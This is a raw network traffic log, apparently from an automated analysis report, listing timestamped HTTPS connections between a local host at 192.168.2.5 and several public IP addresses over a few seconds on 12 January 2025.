                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.271337986 CET44350076162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.283322096 CET44350077162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.350200891 CET4435007918.238.49.99192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.350421906 CET50079443192.168.2.518.238.49.99
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.350450039 CET4435007918.238.49.99192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.351547956 CET4435007918.238.49.99192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.351723909 CET50079443192.168.2.518.238.49.99
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.352597952 CET50079443192.168.2.518.238.49.99
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.352699995 CET4435007918.238.49.99192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.352776051 CET50079443192.168.2.518.238.49.99
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.352806091 CET4435007918.238.49.99192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.364351988 CET4435007820.110.205.119192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.365714073 CET50078443192.168.2.520.110.205.119
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.365731001 CET4435007820.110.205.119192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.367207050 CET4435007820.110.205.119192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.367331028 CET50078443192.168.2.520.110.205.119
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.369426966 CET50078443192.168.2.520.110.205.119
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.369515896 CET4435007820.110.205.119192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.369609118 CET50078443192.168.2.520.110.205.119
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.385544062 CET44350077162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.385628939 CET44350077162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.385756969 CET50077443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.385835886 CET50077443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.598349094 CET4435009623.43.85.10192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.598422050 CET50096443192.168.2.523.43.85.10
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.599497080 CET50096443192.168.2.523.43.85.10
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.599581957 CET4435009623.43.85.10192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.609092951 CET4435009523.43.85.10192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.609596014 CET50095443192.168.2.523.43.85.10
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.609610081 CET4435009523.43.85.10192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.610610962 CET4435009523.43.85.10192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.610800982 CET50095443192.168.2.523.43.85.10
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.611083984 CET50095443192.168.2.523.43.85.10
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.611150026 CET4435009523.43.85.10192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.679694891 CET50096443192.168.2.523.43.85.10
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.679713964 CET4435009623.43.85.10192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.694256067 CET4435010423.43.85.42192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.694497108 CET50104443192.168.2.523.43.85.42
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.694516897 CET4435010423.43.85.42192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.696027994 CET4435010423.43.85.42192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.696122885 CET50104443192.168.2.523.43.85.42
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.698065042 CET50104443192.168.2.523.43.85.42
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.698163033 CET4435010423.43.85.42192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.699208975 CET50107443192.168.2.513.89.179.13
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.699233055 CET4435010713.89.179.13192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.699301004 CET50107443192.168.2.513.89.179.13
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.699645042 CET50107443192.168.2.513.89.179.13
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.699661016 CET4435010713.89.179.13192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.709392071 CET50108443192.168.2.513.89.179.13
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.709414005 CET4435010813.89.179.13192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.709511995 CET50108443192.168.2.513.89.179.13
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.710692883 CET50108443192.168.2.513.89.179.13
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.710707903 CET4435010813.89.179.13192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.717241049 CET44350098204.79.197.219192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.717571974 CET50098443192.168.2.5204.79.197.219
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.717592001 CET44350098204.79.197.219192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.719276905 CET44350098204.79.197.219192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.719377995 CET50098443192.168.2.5204.79.197.219
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.721316099 CET50098443192.168.2.5204.79.197.219
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.721399069 CET44350098204.79.197.219192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.724574089 CET44350097204.79.197.219192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.724766016 CET50097443192.168.2.5204.79.197.219
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.724776030 CET44350097204.79.197.219192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.726269960 CET44350097204.79.197.219192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.726330042 CET50097443192.168.2.5204.79.197.219
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.727272034 CET50097443192.168.2.5204.79.197.219
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.727365971 CET44350097204.79.197.219192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.746148109 CET50095443192.168.2.523.43.85.10
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.746155977 CET4435009523.43.85.10192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.746198893 CET50104443192.168.2.523.43.85.42
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.746218920 CET4435010423.43.85.42192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.848597050 CET50097443192.168.2.5204.79.197.219
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.848607063 CET44350097204.79.197.219192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.848649979 CET50104443192.168.2.523.43.85.42
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.848725080 CET50095443192.168.2.523.43.85.10
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.887552023 CET50096443192.168.2.523.43.85.10
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.887566090 CET50098443192.168.2.5204.79.197.219
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.887574911 CET44350098204.79.197.219192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.949393988 CET50097443192.168.2.5204.79.197.219
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:16.018410921 CET50098443192.168.2.5204.79.197.219
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:16.159384966 CET4435010620.110.205.119192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:16.159730911 CET50106443192.168.2.520.110.205.119
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:16.159759998 CET4435010620.110.205.119192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:16.160974979 CET4435010620.110.205.119192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:16.161533117 CET50106443192.168.2.520.110.205.119
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:16.161716938 CET4435010620.110.205.119192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:16.161756992 CET50106443192.168.2.520.110.205.119
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:16.203367949 CET4435010620.110.205.119192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:16.216140032 CET44350105195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:16.216233015 CET50105443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:16.221139908 CET50105443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:16.221149921 CET44350105195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:16.222995996 CET50105443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:16.223001957 CET44350105195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:16.223109007 CET50105443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:17.129497051 CET4435011213.89.179.13192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:17.129534960 CET50112443192.168.2.513.89.179.13
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:17.129584074 CET4435011213.89.179.13192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:17.246678114 CET50112443192.168.2.513.89.179.13
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:17.246695995 CET4435011213.89.179.13192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:17.295264959 CET44350113195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:17.295383930 CET50113443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:17.296067953 CET50113443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:17.296080112 CET44350113195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:17.297872066 CET50113443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:17.297883987 CET44350113195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:17.297947884 CET50113443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:17.297966957 CET44350113195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:17.298109055 CET50113443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:17.298141956 CET44350113195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:17.298279047 CET50113443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:17.298428059 CET44350113195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:17.298825979 CET50113443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:17.298855066 CET44350113195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:17.298897028 CET50113443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:17.298913002 CET44350113195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:17.314196110 CET4435011213.89.179.13192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:17.314307928 CET50112443192.168.2.513.89.179.13
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:17.315190077 CET50112443192.168.2.513.89.179.13
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:17.315205097 CET4435011213.89.179.13192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:17.355249882 CET50113443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:17.355290890 CET44350113195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:17.413428068 CET4435011413.89.179.13192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:17.414180994 CET50114443192.168.2.513.89.179.13
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:17.414196014 CET4435011413.89.179.13192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:17.415462971 CET4435011413.89.179.13192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:17.420239925 CET50114443192.168.2.513.89.179.13
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:17.420393944 CET4435011413.89.179.13192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:17.421282053 CET50114443192.168.2.513.89.179.13
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:17.421519041 CET50114443192.168.2.513.89.179.13
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:17.421546936 CET4435011413.89.179.13192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:17.590272903 CET4435011413.89.179.13192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:17.590490103 CET4435011413.89.179.13192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:17.590573072 CET50114443192.168.2.513.89.179.13
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:17.590977907 CET50114443192.168.2.513.89.179.13
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:17.591001034 CET4435011413.89.179.13192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:17.591028929 CET50114443192.168.2.513.89.179.13
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:17.591070890 CET50114443192.168.2.513.89.179.13
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:17.763685942 CET44350105195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:17.763766050 CET50105443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:17.763797045 CET44350105195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:17.763840914 CET50105443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:17.763870001 CET44350105195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:17.763919115 CET50105443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:17.764657021 CET50105443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:17.764672995 CET44350105195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:18.582444906 CET44350113195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:18.582525969 CET50113443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:18.582612038 CET44350113195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:18.582652092 CET44350113195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:18.582674026 CET50113443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:18.582704067 CET50113443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:18.583573103 CET50113443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:18.583609104 CET44350113195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:18.760385990 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:18.760452032 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:18.760602951 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:18.760931015 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:18.760950089 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.402889967 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.402978897 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.403533936 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.403564930 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.405349016 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.405361891 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.405535936 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.405570030 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.416608095 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.416630030 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.416635990 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.416646957 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.416656971 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.416692019 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.416722059 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.416737080 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.416742086 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.416762114 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.416788101 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.416918993 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.417151928 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.417164087 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.417179108 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.417244911 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.417295933 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.417340040 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.417403936 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.417412043 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.417428970 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.417494059 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.417546034 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.417594910 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.417612076 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.417664051 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.417781115 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.417800903 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.417809963 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.421324968 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.421463013 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.421525955 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.423629999 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.423660040 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.426009893 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.426140070 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.426212072 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.426333904 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.426361084 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.426367044 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.426517010 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.427671909 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.427689075 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.427818060 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.427876949 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.428013086 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.428050041 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.428330898 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.428355932 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.428766012 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.428818941 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.428884983 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.428992033 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.429020882 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.429228067 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.429259062 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.429402113 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.433398962 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.433535099 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.433810949 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.433917046 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.433953047 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.434412003 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.475328922 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.475469112 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.480386972 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.480571985 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.480736017 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.480830908 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.480884075 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.481316090 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.481350899 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.694521904 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.697130919 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.716519117 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.716692924 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.716998100 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.717040062 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.717041016 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.717096090 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.717288017 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.717324972 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.717370033 CET44350115195.201.141.106192.168.2.5
